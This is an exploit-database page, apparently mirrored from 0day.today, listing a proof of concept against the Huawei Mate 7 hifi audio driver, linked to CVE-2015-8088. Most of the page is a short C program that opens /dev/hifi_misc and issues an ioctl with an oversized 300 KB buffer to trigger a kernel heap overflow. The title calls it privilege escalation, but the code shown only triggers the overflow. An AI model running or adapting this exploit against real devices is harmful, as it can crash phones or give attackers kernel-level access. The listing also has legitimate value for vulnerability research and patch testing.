Lucene search
Pray3r1337DAY-ID-30018HistoryMar 20, 2018 - 12:00 a.m.
Huawei Mate 7 - (/dev/hifi_misc) Privilege Escalation Exploit
2018-03-2000:00:00
pray3r
0day.today
14
0.002 Low
EPSS
Percentile
59.0%
Exploit for hardware platform in category local exploits
/*
*
* HuaWei Mate7 hifi driver Poc
*
* Writen by pray3r, <[email protected]>
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#define HIFI_MISC_IOCTL_WRITE_PARAMS _IOWR('A', 0x75, struct misc_io_sync_param)
struct misc_io_sync_param {
void * para_in;
unsigned int para_size_in;
void * para_out;
unsigned int para_size_out;
};
int main(int arg, char **argv)
{
int fd;
void *in = malloc(300 * 1024);
void *out = malloc(100);
struct misc_io_sync_param poc;
poc.para_in = in;
poc.para_size_in = 300 * 1024;
poc.para_out = out;
poc.para_size_out = 100;
fd = open("/dev/hifi_misc", O_RDWR);
ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);
free(in);
free(out);
return 0;
}
# 0day.today [2018-04-06] #Related
cvelist
cvelist
CVE-2015-8088
2016-01-12 19:00:00
huawei
huawei
nvd
nvd
CVE-2015-8088
2016-01-12 19:59:07
cve
cve
CVE-2015-8088
2016-01-12 19:59:07
prion
prion
Heap overflow
2016-01-12 19:59:00